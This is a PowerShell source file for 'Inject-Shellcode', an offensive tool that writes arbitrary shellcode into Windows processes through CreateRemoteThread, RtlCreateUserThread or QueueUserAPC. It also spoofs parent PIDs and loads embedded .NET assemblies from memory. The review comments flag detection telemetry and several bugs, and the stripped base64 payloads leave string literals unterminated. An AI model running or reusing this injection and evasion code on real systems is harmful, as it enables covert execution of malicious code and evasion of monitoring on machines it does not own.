function Inject-Shellcode ([switch]$x86, [switch]$x64, $ParentID, [switch]$RTLCreateUserThread, [switch]$QueueUserAPC,[switch]$Force, [switch]$Suspended, [Parameter(Mandatory=$true)]$Shellcode, $ProcID, $ProcPath, $ProcessName, $ProcName)
{
<#
.SYNOPSIS
Inject-Shellcode using many different methods

Author: @benpturner

Methods:
+ QueueUserAPC
+ CreateRemoteThread
+ RTLCreateUserThread

.DESCRIPTION
Injects shellcode into x86 or x64 bit processes. Tested on Windows 7 32 bit, Windows 7 64 bit and Windows 10 64bit.

.PARAMETER Shellcode
Byte array written into the target process (mandatory).

.PARAMETER x86
States that the shellcode is 32-bit. Required to proceed against a WOW64 (x86) target unless the host itself is x86.

.PARAMETER x64
Declared but never read inside this function.

.PARAMETER ParentID
PID handed to [PPIDSpoofer]::CreateProcess as the parent of the process this function creates.

.PARAMETER ProcID
PID of an existing process to open instead of creating one.

.PARAMETER ProcPath
Image path for the created process when neither -ProcID nor -ProcessName is given; defaults to netsh.exe.
-ProcessPath is not a parameter even though one example spells it that way.

.PARAMETER ProcessName
Process name passed to GetProcessesByName. -ProcName is an alternate spelling folded into it below.

.PARAMETER Suspended
Create the new process suspended.

.PARAMETER RTLCreateUserThread
Use RtlCreateUserThread rather than CreateRemoteThread for the thread start.

.PARAMETER QueueUserAPC
Queue the written code as an APC on the created process's thread and resume that thread.

.PARAMETER Force
Declared but never read inside this function; the hint printed for an x86 target without -x86 has no effect.

.EXAMPLE
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502

.EXAMPLE
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> OpenThread -> QueueUserAPC -> ResumeThread
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -QueueUserAPC

.EXAMPLE
CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> RTLCreateUserThread
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -RTLCreateUserThread

.EXAMPLE
OpenProcess(CUSTOM PID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634

.EXAMPLE
CreateProcess(CUSTOM ProcPath) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessPath C:\Windows\System32\notepad.exe

.EXAMPLE
OpenProcess(CUSTOM ProcessName) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessName notepad.exe

.EXAMPLE
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X64 -> x86
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x86

.EXAMPLE
OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X86 -> x64
Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x64

.NOTES
Review observations (the code is left as written):
- The Win32 wrappers ([Inject], [PPIDSpoofer], and [Thread.Util] for the 32-to-64 case) come from .NET
  assemblies embedded as base64 strings and loaded from memory with [System.Reflection.Assembly]::Load;
  nothing is written to disk. In this copy the base64 payloads have been stripped, leaving those string
  literals unterminated. From a monitoring standpoint both the in-memory CLR assembly loads and the
  cross-process sequence OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
  WriteProcessMemory -> remote thread/APC are the usual telemetry points; a created process whose
  recorded parent (-ParentID) differs from its actual creator is a further signal.
- When -ProcessName/-ProcName is used, $Process is looked up but $injectpid is never assigned, so
  $ProcessIDVal is $null on that path.
- The QueueUserAPC branch reads $injectpiddwThreadID and $injectpidhThread, which are only populated in
  the branches where this function created the process, not for -ProcID or -ProcessName.
- In the 32-to-64 branch $e is overwritten with the constant 1241 right after CreateRemoteThread64, so
  the "$e -eq 0" fallback to RtlCreateUserThread can never trigger there.
- The process handle from OpenProcess, the thread handle from OpenThread and the AllocHGlobal buffer are
  never released; the "# Close all handles" marker has no code behind it.
- $TokenHandle is the [ref] out-parameter receiving the new thread handle (and the QueueUserAPC data
  argument); the name is misleading.
#>

    # -ProcName / -ProcPath are alternate spellings; fold them into the names used below.
    if($ProcName){
        $ProcessName = $ProcName
    }
    if($ProcPath){
        $ProcessPath = $ProcPath
    } else {
        $ProcessPath = "C:\Windows\system32\netsh.exe"
    }

    # Embedded .NET assembly (base64), presumably the one defining [Inject] (and possibly
    # [PPIDSpoofer]); it is loaded straight from memory. Payload stripped from this copy.
    $p = "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
    $dl = [System.Convert]::FromBase64String($p)
    $a = [System.Reflection.Assembly]::Load($dl)
    # Instance is never used; every [Inject] call below is static.
    $o = New-Object Inject

    echo ""
    echo "[+] Inject-Shellcode"
    echo ""

    # -x86 with no explicit path: use the 32-bit netsh.exe (SysWOW64 on a 64-bit host).
    if ($x86.IsPresent -and (!$procpath)) {
        if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
            $ProcessPath = "C:\Windows\System32\netsh.exe"
        } else {
            $ProcessPath = "C:\Windows\Syswow64\netsh.exe"
        }
    }

    if ($Suspended.IsPresent) {
        $SuspendedState = $true
    } else {
        $SuspendedState = $false
    }

    # Target selection: existing process by name or PID, otherwise create one.
    if ($ProcessName) {
        # NOTE(review): $injectpid is not set here, so $ProcessIDVal below ends up $null.
        $Process = [System.Diagnostics.Process]::GetProcessesByName($ProcessName)
    } elseif ($ProcID){
        echo "Using ProcID"
        $Process = [System.Diagnostics.Process]::GetProcessById($ProcID)
        $injectpid = $ProcID
    } else {
        # Four variants of the same call: parent PID (0 = none) x suspended flag. The result
        # exposes PROCESS_INFORMATION-style fields dwProcessId / dwThreadID / hThread.
        if (($SuspendedState) -and ($ParentID)) {
            $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $true)
            echo "[+] Parent Spoofing $ParentID & New Suspended Process: $ProcessPath"
            $injectpid = $Success.dwProcessId
            $injectpiddwThreadID = $Success.dwThreadID
            $injectpidhThread = $Success.hThread
        } elseif ((!$SuspendedState) -and ($ParentID)) {
            $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $false)
            echo "[+] Parent Spoofing $ParentID & New Process: $ProcessPath"
            $injectpid = $Success.dwProcessId
            $injectpiddwThreadID = $Success.dwThreadID
            $injectpidhThread = $Success.hThread
        } elseif (($SuspendedState) -and (!$ParentID)) {
            $Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $true)
            echo "[+] New Suspended Process: $ProcessPath"
            $injectpid = $Success.dwProcessId
            $injectpiddwThreadID = $Success.dwThreadID
            $injectpidhThread = $Success.hThread
        } else {
            $Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $false)
            echo "[+] New Process: $ProcessPath"
            $injectpid = $Success.dwProcessId
            $injectpiddwThreadID = $Success.dwThreadID
            $injectpidhThread = $Success.hThread
        }
    }

    $ProcessIDVal = $injectpid
    # IsProcess-x86 is defined later in this file; it reports whether the target is a WOW64 (x86) process.
    $ProcessX86 = IsProcess-x86 $ProcessIDVal
    $Proceed = $false
    $64to32 = $false

    # Architecture gate: an x86 target is refused unless -x86 was given or the host itself is x86.
    # NOTE(review): the hint below mentions -Force, but $Force is never read.
    if (($x86.IsPresent) -and ($ProcessX86)) {
        echo "[+] Running against x86 process with ID: $ProcessIDVal"
        $Proceed = $true
    } elseif (($env:PROCESSOR_ARCHITECTURE -eq "x86") -and ($ProcessX86)) {
        echo "[+] Running against x86 process with ID: $ProcessIDVal"
        $Proceed = $true
    } elseif ($ProcessX86) {
        echo "[-] x86 process identified, use -x86 or this could crash the process"
        echo "If you believe this is wrong use -Force to try injection anyway - use at own risk"
        $Proceed = $false
    } else {
        echo "[+] Running against x64 process with ID: $ProcessIDVal"
        $Proceed = $true
        # Provisional; cleared below if the current process is x64 as well.
        $64to32 = $true
    }

    # $PID is the current (PowerShell host) process.
    $CurrentProcX86 = IsProcess-x86 $PID
    if ($CurrentProcX86) {
        echo "[+] Current process arch is x86: $PID"
        if ($64to32) {
            # 32-bit caller, 64-bit target: a second embedded assembly ([Thread.Util]) is loaded,
            # presumably because the plain [Inject]::CreateRemoteThread path does not work in that case.
            # https://github.com/Coder666/Invoke-CreateRemoteThread64/blob/master/Invoke-CreateRemoteThread64.ps1
            # Author: TomW (Coder666)
            # [Thread.Util]::CreateRemoteThread64()
            # Payload stripped from this copy.
            $lib = "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
            $libraw = [System.Convert]::FromBase64String($lib)
            $a = [System.Reflection.Assembly]::Load($libraw)
            echo "[+] Injecting from 32bit to 64bit - Loading alternative library for CreateRemoteThread64"
        }
    } else {
        echo "[+] Current process arch is x64: $PID"
        $64to32 = $false
    }
    echo ""

    if ($Proceed) {
        try {
            # Full-access handle to the target; never closed (see .NOTES).
            [IntPtr]$phandle = [Inject]::OpenProcess([Inject]::PROCESS_ALL_ACCESS, $false, $ProcessIDVal);
            # Probe for a free region from 0x10000 upward, stepping by the shellcode length, requesting
            # twice the shellcode size with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE
            # (0x40). Stops at the first non-NULL result or once the probe address reaches 0x70000000.
            [IntPtr]$zz = 0x10000
            [IntPtr]$x = 0
            [IntPtr]$nul = 0
            [IntPtr]$max = 0x70000000
            while( $zz.ToInt32() -lt $max.ToInt32() )
            {
                $x=[Inject]::VirtualAllocEx($phandle,$zz,$Shellcode.Length*2,0x3000,0x40)
                if( $x.ToInt32() -ne $nul.ToInt32() ){
                    break
                }
                $zz = [Int32]$zz + $Shellcode.Length
            }
            echo "VirtualAllocEx"
            echo "[+] $x"
            if( $x.ToInt32() -gt $nul.ToInt32() )
            {
                # Stage the bytes in an unmanaged buffer (never freed) and copy them into the target.
                $hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length)
                [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)
                $s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)
                echo "WriteProcessMemory"
                echo "[+] $s"

                if ($RtlCreateUserThread.IsPresent){
                    # $TokenHandle receives the new thread handle via [ref]; the name is misleading.
                    $TokenHandle = [IntPtr]::Zero
                    $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
                    echo "RtlCreateUserThread"
                    # $c is an NTSTATUS; 0xC0000022 is STATUS_ACCESS_DENIED.
                    $hexVal = "{0:x}" -f $c
                    if ($hexVal -eq "c0000022") {
                        echo "[-] Access Denied 0xC0000022"
                    } else {
                        echo "[+] Dec: $c"
                        echo "[+] Hex: 0x$($hexVal)"
                    }
                } elseif ($QueueUserAPC.IsPresent) {
                    # Depends on $injectpiddwThreadID / $injectpidhThread, which are only populated when this
                    # function created the process; with -ProcID or -ProcessName they are $null.
                    $QueuePtr = [IntPtr]::Zero
                    $TokenHandle = [IntPtr]::Zero
                    echo "QueueUserAPC"
                    echo "[+] ThreadID dwThreadID: $injectpiddwThreadID"
                    echo "[+] Handle hThread: $injectpidhThread"
                    # 0x0010 is THREAD_SET_CONTEXT. The thread handle is never closed.
                    $otptr = [Inject]::OpenThread(0x0010,$false,[int]$injectpiddwThreadID)
                    $QueuePtr = [Inject]::QueueUserAPC($x,$otptr, $TokenHandle)
                    # Resume the thread the APC was queued on (only meaningful if it was created suspended).
                    $ResumeThread = [Inject]::ResumeThread($injectpidhThread)
                    echo "[+] Resume Thread Return Value: $ResumeThread"
                    $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
                } else {
                    if ($64to32) {
                        $e = [Thread.Util]::CreateRemoteThread64($phandle.ToInt32(),$x.ToInt32(),0)
                        echo "CreateRemoteThread64"
                        # NOTE(review): discards the real return value, so the "$e -eq 0" fallback
                        # below can never fire on this path.
                        $e = 1241
                    } else {
                        $e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)
                        echo "CreateRemoteThread"
                    }
                    $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
                    echo "[+] $e"

                    # Fallback: a NULL thread handle from CreateRemoteThread triggers a retry via RtlCreateUserThread.
                    if ($e -eq 0) {
                        $TokenHandle = [IntPtr]::Zero
                        $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
                        echo "RtlCreateUserThread"
                        # $c is an NTSTATUS; 0xC0000022 is STATUS_ACCESS_DENIED.
                        $hexVal = "{0:x}" -f $c
                        if ($hexVal -eq "c0000022") {
                            echo "[-] Access Denied 0xC0000022"
                        } else {
                            echo "[+] Dec: $c"
                            echo "[+] Hex: 0x$($hexVal)"
                        }
                    }
                }

                $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
                echo "[-] LastError: $Lasterror"
            } else {
                echo "[-] Failed using VirtualAllocEx"
                $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
                echo "[-] LastError: $Lasterror"
                echo ""
            }
        } catch {
            # Any exception is printed and swallowed; the function returns normally afterwards.
            echo $Error[0]
        }

        # Close all handles
        # NOTE(review): no code follows this marker; $phandle, $otptr and the $hg buffer are leaked.
    }
}
$psloadedprochandler = $null
# Returns the IsWow64Process out-value for the given PID, i.e. non-zero when the process is a
# 32-bit (WOW64) process on a 64-bit host. Output is whatever the [ref] receives (declared
# as IntPtr here), not a PowerShell [bool].
Function IsProcess-x86 ($processID) {
    # One-time load of the embedded [ProcessHandler] assembly, tracked by the script-scope flag.
    # The read uses the unqualified name and the write uses $script:, which agree only because
    # this function never declares a local of the same name.
    if ($psloadedprochandler -ne "TRUE") {
        $script:psloadedprochandler = "TRUE"
        # Base64 .NET assembly loaded from memory; payload stripped from this copy.
        $ps = "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
        $dllbytes = [System.Convert]::FromBase64String($ps)
        $assembly = [System.Reflection.Assembly]::Load($dllbytes)
    }

    # Presumably errors when $processID is not a live PID (including $null from a caller that never set it).
    $processHandle = (Get-Process -id $processID).Handle
    # Out-parameter for IsWow64Process. Despite the name, a non-zero value means "32-bit under WOW64".
    # Assumes the P/Invoke declaration takes the out-parameter as IntPtr - not visible here, confirm.
    $is64 = [IntPtr]::Zero
    try{
        [ProcessHandler]::IsWow64Process($processHandle, [ref]$is64) |Out-Null
    } catch {
        # Deliberately swallowed: on any failure $is64 stays Zero and the caller treats the target as not x86.
    }
    # NOTE(review): on a native 32-bit OS IsWow64Process reports FALSE for every process, so this
    # also answers "not x86" there; the caller partly compensates by checking PROCESSOR_ARCHITECTURE.
    $is64
}